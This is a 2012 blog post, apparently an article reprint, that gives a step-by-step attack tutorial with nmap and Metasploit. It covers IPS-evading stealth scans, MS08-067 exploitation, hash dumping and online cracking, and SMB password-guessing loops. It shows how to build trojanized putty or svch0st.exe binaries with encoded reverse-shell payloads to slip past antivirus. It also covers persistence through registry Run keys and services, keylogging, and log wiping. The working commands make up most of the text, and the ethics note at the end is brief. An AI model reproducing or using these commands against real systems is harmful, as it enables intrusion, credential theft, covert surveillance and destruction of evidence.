Tuesday, February 21, 2012

Exploiting Software

hakin9.org metasploit

In hakin9.org February release, I have wrote more on the latest version of nmap as well as metaploit how it could harm your network. In the article you will have an idea what does metasploit can offer you. I would like to share the in and out of the tools and how it can beneficial to any of the security practitioner.Below will be the content of the articles.

The power of exploitation tools
Since 2011, we have heard about a lot of incidents around the world about confidential information being compromised, government website being defaced and big corporation networks crippled for some reason. The famous example will be the anonymous group, but have you ever wonder why the success factor is? Is this the new area of the modern ninja?

Till now, we don't much hear in the news mentioning, corporate network attack by ninja. Rather we hear the term blackhat. Blackhat practitioners have the similar practices as the ancient ninja. The tools used by ninja today will be different than the ancient. The most common technique they use will be scanning and exploitation. I will cover the 2 important areas and type of attacks using nmap and metasploit.
What does a malicious hacker do
Is either a blackhat or whitehat  they do know what is required to hack a system or to secure a system. Below are the 4 core areas that are part of the cycle:
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

NMAP Scanning
NMAP is by the far is the most popular port scanning tools. Why it was so popular? It’s because NMAP provides the following information for attackers:
  • Live host on the network, although it some cases the security administrator will block the ICMP to avoid the detection. Nmap can detect those host by applying a command such as nmap ip address –Pn parameter at the end of the command.
  • Identified target information such as OS detection (nmap ip address -O), service detection (nmap ip address -sV).
  • And it is also scriptable interaction with target (e.g. nmap –sT –scrip=smb-check-vulns –P0 ip address). The scanning will detect whether there is any machine on the network which are not bee patches with MS08-067.
From the information collected, you will have more visibility on what are the target machine is and you can properly plan for your attack.

The art of scanning is very important and we always try to gain information about the targets without revealing your presence or intentions. One of the preferred options for scanning will be the stealth TCP scan against the remote system. As you can see from the figure 1: the result of nmap scanning will give you an idea what is running on the remote server with the list of running ports, along with a description that have been detected.

Figure 1: Result of nmap scanning.
As on figure 1, this type of scanning won’t be working on the host anymore as you know intrusion prevention system is been implemented across system for a better protection. Although you did see in figure 1, we did use the –sS (sync scan) and –A(enable all detection), this is no longer recommended to use as we have another piece of software which is IPS that we need to bypass. The –A flags is not advice to use where by IPS exists as the scanning containing a lot of noise.
On most of the time, if we need to perform a stealth scanning, the following technique need to be in place like the above :
  • nmap -v -Pn -sS -f --mtu 32 --data-length 50 --source-port 99 --randomize-hosts -T 1
  • -sS is a half-open or Syn scan. These scans do not complete all three steps of the TCP hand shake and there for has a chance of not being logged or picked up by an IPS. The default tcp syn scan attempt to identify the 1000 most commonly use tcp port.
  • -f frament packet.This fragments your packet. The idea here is to split up the TCP headers over many packets in order to make it harder for a firewall or IPS to understand the pattern.
  • --mtu is specific MTU size. It is almost same as –f option. In this example we are using mtu size of 32 and the size must be in the following(e.g.8,16,24,32…)
  • --data-length spec length of the packet. This is important to avoid some of the firewall vendor to known the predictable size. In this example we have added 50 bytes to all packet.
  • --source-port specify source port to bypass poor firewall config
  • --randomize-hosts = a typical IDS or IPS signature might pick up if you scan multiple target hosts in order. Randomizing the order in which you scan helps avoid this. In this option you might want to consider when you have a list of ip to scan.
  • -T 2 This is the timing setting When done with a full port range (-p1-65535) on four IP’s it takes 1000 seconds to complete. The -T2 option is the time setting, T1 is the slowest.

But as you can see, each time when you do perform information gathering nmap does give you a lot of information and it won’t be pragmatic if you keep all of that information in a single file. This is where metasploit comes into the picture to reduce the effort. All information that was been scanned will keep into database rather than a flat file.
NMAP Integration with database
Once we know what are we looking for, we need to document all our findings into a proper format so that we can easily find those vulnerable machines that we plan to exploit. As in my previous example, we have learned how to use the stealth technique on performing scanning on the server. Now we need to output our scanning into a usable format. In my past experience,  I did use a lot of bash shell scripting to find to perform the same task as NMAP.
Before I go into the easier way, I would like to share the following, the script perform a scan into the subnet 10 and try to find the live host and filter only windows server. The method is messy as it contains too much code , but if you are good in shell you are in control in the game.
for i in `seq 1 254`;
ping -c 1 10.1.1.$1 | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &

nmap -p 139 x.y.z.* -oG 139.txt
cat 139.txt | grep open | cut -d" " -f2
cat 139.txt | grep open | cut -d" " -f2 > 139-ips.txt
nmap -O -iL 139-ips -oG 139-os.txt
cat 139-os.tx | grep open | cut -d":" -f4

The other method is much easier, what we need to do is use the same command to run the scan and export it into xml format. What we need to do will be to use the above command nmap –sS –Pn –A –oX subnet10 What you will be expected will be a file name as subnet10.xml will be created.

Storing scan result into Metasploit
Take note that mysql is no longer supported in metasploit and you will need to use postgresql as the main database. The database it is not part of the package and you need to install it manually. The steps of installing is not hard, you can follow the steps as below. I have attached some of the mini steps for you to follow.

  • You can install the server and client by issuing the following command apt-get install postgresql-8.4 postgresql-client-8.4.
  • This would be the path where you can start the service , /etc/init.d/postgresql-8.4 start.
  • Next step you will need to disable the SSL in the config file. To do thisnano /etc/postgresql/8.4/main/postgresql.conf. Find the content as above: 
    #ssl = true # (change requires restart)
  • Now we are done with the postgresql,next step we would need to start the service  by typing the following command /etc/init.d/postgresql-8.4 start.
  • To configure the password you can use the following command
  • Open the terminal and type the following ALTER USER postgres WITH PASSWORD 'mypassword ';\q sudo passwd -d postgres.  I believe some of you who have been using mysql will see it is easier to use.

The next steps would be creating the databases in metasploit and load the scan xml from nmap into it. What we need to do is to load the metasploit console. I will write down the summary in 3 steps.
  • Load metasploit by typing msfconsole. This is the command to start the engine.
  • Db_connect postgres:mypassword@ The above syntax will create a new database called as mypentest with all the required tables. The format can be summarized as the following db_connect username:password@localhost/databasename
  • Db_import subnet10, will help you to import the scan that you have perform earlier into the database. Do take notes that nmap scanning doesn’t give you an idea what are those vulnerabilities is but it give you an idea on those port and finger printing the operating system.
  • However for the sake of testing purpose in backtrack 5, we can do a further check on the smb vulnerabilities by typing the above command nmap –sT –script=smb-check-vulns –P0 I see this is a pretty awesome command for you to start test. As you know in a lot of organization will have some challenges in patch management. By doing this we can straight to the point on the areas that we would like to exploit.

Motive of the attacker
After we have run through the scanning tools, the 2nd step will finding the system that we can further attack. The most common vulnerability that insider espionage are likely to use are the following. Most probably you will think that the 4th point is likely to be a waste of time and you will never find those in the network. What if you have more than thousands of server to check, I believe it will have at least 1% of the server that is not properly managed. However I would like to cover more than just software exploitation. We as the administrator have an important part of managing server, but have ever you thought those tools we use are free from malware? In this article I will cover how we can re-engineering the software without breaking the software. This is important to detect the antivirus scanning.
  • Un-patched Microsoft Windows Server
  • Weak admin password
  • Sql server
  • Vnc server which provide graphical access to remote system which have the similarity to Microsoft’s Remote Desktop
  • Sending malware to the users.

What is metasploit
The Metasploit Project is an open-source computer security project which develop by HD Moore. Over the years, the tools have improved since October 2003. Originally there were 11 exploits and guess what are the total number now? Now the framework consists of 798 exploit and 246 payloads. Metasploit is comes in a free and commercial versions, which are updated on regular basis. You can always update the software by issuing the msfupdate command to get the latest exploit and test it out.
What can Metasploit really do?
Judging from the name of the tools, you know that the usage of the tools is to exploit a vulnerable system. Before I get started what we will do with the software, you must know what metasploit can do. One of the features that may be good to remove is the db_autopwn, which allows you to perform an automatic attack on the hosts. This might allow unintentional attack. What I would like to cover next will be the 5 attack vectors that are most commonly used.

Attack vector 1: Un-patch Microsoft Windows Server
Attacking a windows machine seems to be quite common in today's technology, this is due to the lack of patch management as well other factors which would be running a non genuine Microsoft product. How would the attacker start, most probably with the common vulnerabilities which is MS08-067. This is not a joke, as there are some organization never patches their systems. There are two approaches to start an attack; the first approach is we just do a guess that they have a vulnerable system and the 2nd approach will be using scanner which I have explained earlier.

Metasploit it is not so hard to use, if we know the concept of using it. In each of the attacks what we need would be the exploit and also payload. Exploit is the term we use to describe when there is unforeseen protective measure that might be in place to prevent a particular exploit.

Payload is the code that we want the system to interact with the attacker on the successful exploitation. To start metasploit, we must run the first command which is msfconsole, which displays the most common screen we use.

To find the exploit for MS08-067, we can issue a command “search ms08-067”, and you can find where the exploit located. There are some flexibilities that are built-in.
Figure 2 : Example configuration on exploiting vulnerabilities on windows xp

As you can see on the Figure 2, metasploit has been configure to use the MS08-067 vulnerability on the target host. As you can see the payload we use meterpreter which can provide a lot more flexibility in term handling the remote system. In the payload option LPORT has been set to port 8080, as most likely port 8080 will be proxy and its even better if we could set it to a well known port to avoid detection such as port 80 and port 443.If you want to see the list of the meterpreter option, you can always type the help command to see all the available option.

  • Core command
  • File system
  • Networking
  • System
  • User interface
  • Webcam
  • Elevate
  • Password database
  • Timestomp
 Figure 3: Hashing user id

As you can see on figure 3, we have get the hashes. In some cases , admin user id will be renamed to other name to hide its role. But however each of the user id will have its own SID to differentiate it from other. The value 500 is the identified to show that the user id is administrator.

In this example, we will collect the information as below. We need to extract the information from the above which is 11cb3f697332ae4cc295285c92cd06b4 and copy it over to http://www.onlinehashcrack.com/index.php. Why we are doing this is to find what are the original password for the exploited machines.


Attack vector 2 : Weak admin password
Checking for weak password has become a must-know skill in all of the security arena.  Although they are many commercial software scanners out in the market that could provide the functionality,  I would like to show you 3 option which we can do in windows server and linux server using script as well using metasploit as our core tools.

Let start with the windows scripts; first what you need to do is type the following at the command prompt. You will need to have a credential file which is password.txt. The format of the password.txt will be following: 

Password      Username
mypassword administrator
password1    admin

Next will be executing the command and you will be able to check the password
FOR /F "token=1, 2*" %i in (password.txt) do net use \\remoteserver\ipc$ %i /u:%j

Do you see this how easy we can built a tools within windows?. But how about linux scripting?. The approach will be the same, just the syntax will be different from windows.The first thing that you need to do is to have a dictionary files called as credential. The content of the files will be as the following:


Next step will be open a shell from the linux and type the following command.

for I in `cat credential`;do smbclient -L remote ip --user=administrator%$I; done

What does the command does is it reads the credential files and puts in "I" which is a variable. After that the command will use smbclient to connect to the remote host with the username administrator. The %$I contains information of the credential file.

As you have learn for far, there are 2 approachs, one for windows and one for linux scripting. One good news regarding to metasploit, it also have the similar functionality. As you can see from figure 4, we have a lot of options for checking weak password on the network. If you want to scan an entire network you can set this on RHOSTS by typing set RHOST This can minimize your effort in developing new code.

 Figure 4: Password auditing tools in metasploit

Attack vector 3 : Sql server
Database servers are always the critical server in handling and processing business requirement. However some of the organizations have a lack of knowledge from the point of security. Instead of security, money was invested in high availability of the server to avoid hardware failure and so on. But however high availability on single database server is not guaranteed if the standard security practices is not in place.

Metasploit has the option of validating if there are any weak passwords in the network, and the most common module we use in metasploit will be scanner/mssql/mssql_login. This is a very important phase of finding the right password before we can go to figure 5. Once we have gotten the password, we can set the configuration as on figure 5 and run the command exploit. If it works we have control of the remote server operating system.

  Figure 5: Setting up exploit on MS SQL

Attack vector 4 : Vnc server
This is my favorite attack among the rest. This is because we are trying our luck whether in the network there is any VNC server running without passwords. As you know, VNC is a console mode, which mean that after you use the session and you don’t lock it, we can see the similar unlock screen on other hosts. Metasploit has the option to find any of these systems with no password. This can better help you in term of managing the risk of been exploited. The first thing that you need to do is search for vnc in the metasploit console; if any are found you will see a list of vnc modules. On this article I will be choosing bypassing vnc options, as you can see below the AUTOVNC have been set to true. By default the configuration is false. If we are successful to attack a remote server, the vnc screen will appear on the attacker screen. However, they are some risk of using the above method. Once you are connected, the VNC icon in the remote server will turn into black. Which mean that is someone is watching, they will see someone connecting to the machines.

 Figure 6: By passing VNC

Attack vector 5 : Sending malware to the users
Among of all the attacks, the attack vector 5 is the most scariest among all. I will explain here why that is. In your organization, you are the system administrator and you use a lot of tools to manage the system. Those tools will be from Microsoft, Sysinternals or any free software providers. Have ever you thought how valid is those files are? Let take an example; I believe everyone has a file server at their organization and where better to store all the required files for safety purposes as file server?

But how do you guarantee that the files you use daily for system administration have not been compromised by malware?. When your antivirus scan the files, it detect nothing and you believe this files is free from malware. What if I told you that is wrong. Now we have the abilities to hide the malware from the any antivirus software. The reason behind this attack is each time the user launches the software it will automatically connect back to the attackers. From there the attackers can launch a different type of attack depending on their motive.

Then again, we will use the same payload which is windows/meterpreter/reverse_tcp and setting the LPORT to 8080 to avoid any detection. What we need to do is to encode our binary with shikata_ga_nai. First step of doing it will be download any software that are commonly use by the users such as putty, excel viewer or etc. Copy the files over to /opt/frameworks/msf3/work.

From here we will encode the the binary  by issuing the following command msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=8080 R | msfencode -t exe -x /opt/framework/msf3/work/myfiles.exe -o /root/Desktop/back.exe -e x86/shikata_ga_nai -c 5

On this round we use 5 time encoding which shown as –c 5, the more you do the better the chances for sneaking past the antivirus. When this stage is finished, we have completed the task of creating the binary.

From the attacker side, they would run the command:  msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=8080.

Next we would need someone to click on the files and from there we can launch the attack. The scary part of this is, what if your IT support team were using these infected files, and they have no way of telling whether the files are infected with malware or not.

Maintaining access by planting backdoor
Once we have exploited the machine and we have access to the server, maybe this would be the temporarily access. We might want to revisit the system to get more information on the system:

Install as service
Windows might be rebooted for some reason such as maintenance or crash, most probably you will like to create a backdoor as a service so next time you won’t be needed to perform the same exploit all over again. What you need to do is just wait for the client to power up the machines again.  Persistence flag you only can use once you have exploited the machine and this is where you start installing it as service. I always will prefer to use the port 443 or 80 as this is a common port.

meterpreter > run persistence -S  -i 7 -p 443 -r
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINXP-1_20120211.1431/WINXP-1_20120211.1431.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST= LPORT=443
[*] Persistent agent script is 609615 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\herNEE.vbs
[*] Executing script C:\WINDOWS\TEMP\herNEE.vbs
[+] Agent executed with PID 2952
[*] Installing as service..
[*] Creating service hDFbkpZQqoTkBx

Once the system is rebooted, you can connect back to the host by using the multi handler option. But these way only works for some windows machine which have weak antivirus management. But for the sake of proof of concept. You can try this out to know how the entire framework works.

Capturing keyboard stroke
Some of the attackers when they have exploited the machines, their intention is not to disrupt the availability of the system, but they will have interest to know on stealing the information, one of the way to do it will dumping all keystroke. Before that they must know each of the services is corresponding to which service. In most of the attack the attacker will attack the 2 main services which is winlogon.exe and explorer.exe.

Reason for attacking explorer.exe is simple, they want to know what are the users is typing on the screen. For example if the users is doing some bank transaction over a web browser, those keystroke will be capture. While for winlogon.exe will be toward capturing the password of the users. Although they are other method which to get the LM hash and decrypted it online. In this type of attack you will just need to know 5 command :

  • Ps – this command is to list down all the running process on the windows machine, if you would like to attack winlogon.exe or explorer.exe. You must look for the pid number.
  • Migrate – once you have the pid number , you can type this to migrate to the explorer pid (e.g. migrate 776)
  • Getpid –if you need to switch between pid, sometime you might check you are on which pid. But mostly we don’t use it much.
  • Keyscan_start – This is the most interesting part, where we start the keylogger.
  • Keyscan_dump – Once the keylogger is started, you need to type the entire command and see whether they is any new keystroke recorded.

Creating an automatic backdoor
Creating a backdoor always a challenge as the antivirus have been updated with the latest prevention to make sure those files are not been installed into the machines. My favorite is to create an exe with a name that is almost similar name in the operating system. Some of the examples will be like svchost.exe, you can create a new backdoor name as svch0st.exe. If you notice carefully both names are almost the same, rather the “o” I replace with”0”.

First steps is to create a file by using the following command, which to ensure that antivirus can’t detect this is a backdoor. For the lport I use port 443, is just to hide the fact that the user are browsing internet.

msfpayload windows/meterpreter/reverse_tcp LHOST=attacker_ip_address LPORT=443 R | msfencode -t exe -x /opt/framework/msf3/work/svchost.exe -o /root/Desktop/svch0st.exe -e x86/shikata_ga_nai -c 5

Next step will be uploading the backdoor to the system32 .You can use the above command for uploading
upload /root/Desktop/svch0st.exe c:\\windows\\system32\\

Before you do any further modification to the registry, you can have a look into the startup process name in the registry and plan for a better name. The syntax will be as below :

reg enumkey -k HKLM\\Software\\Microsoft\\WIndows\\CurrentVersion\\Run

Once you have determine the name, you can use the following command to create a startup service. Each time the machine reboot, the service will be automatically startup and the victim will connect back to you via port 443.In the example below I use the name windowsvalidationservice rather than I use the name backdoor.

reg setval -k HKLM\\Software\\Microsoft\\WIndows\\CurrentVersion\\Run -v WindowsValidationService –d c:\\windows\system32\\svch0st.exe

Once you all this setup, the next thing that you need to do is setup the multihandler and wait them connect back to you which I have explain in attack vector 5.

As you can see that, you have the ability to manipulate the registry setting, if you want to attack on yahoo messenger. You can even download the entire registry settings from HKEY_Current_users\software\yahoo\pager and install the registry into your PC. This is also one of the way of stealing identity.

Clear your tracks
This would be the last phase of the attack, of course you won’t want people to catch you for all the damages that you have did. The most important part will be deleting the logs. The last step is the most simple step, what you need to do is just type a single command which is clearev. What does this command do is, it will delete everything from the logs.

Note on ethics
Our intention, when we started writing these articles was to give an overview what tools exists on the market and how we can use it to secure our organization against any unidentified threats. When you start to use the tools above, please do make sure you have this with you:
Don’t use this for any malicious intention
Don’t attack any organization without any approval from the top management.
Think of the damage that you might cause

In this article, we have presented the abilities of the NMAP as well as metasploit on backtrack 5. We have shown the trick of hiding in the network while we are performing intelligent information gathering. The author also shows you a common attack that commonly done by the attacker and to show how fast they compromise a system. As you can see, the growing of the tools can help anyone to be a security pentester, while if it is been used in a wrong hands it could bring more damage than good. Such and attack is much easier to perform and more likely to succeed. The author sincerely hopes that these short articles can increase the awareness to anyone who is handling computer or security services. In the broader sense however, we hope that the information could help you to increase the security your organization assets in better manner.

Stay tune with my next articles. Let us know what you though , learns and hope for next articles!. Connect with us on GOOGLE+ , TWITTER and FACEBOOK.

No comments:

Post a Comment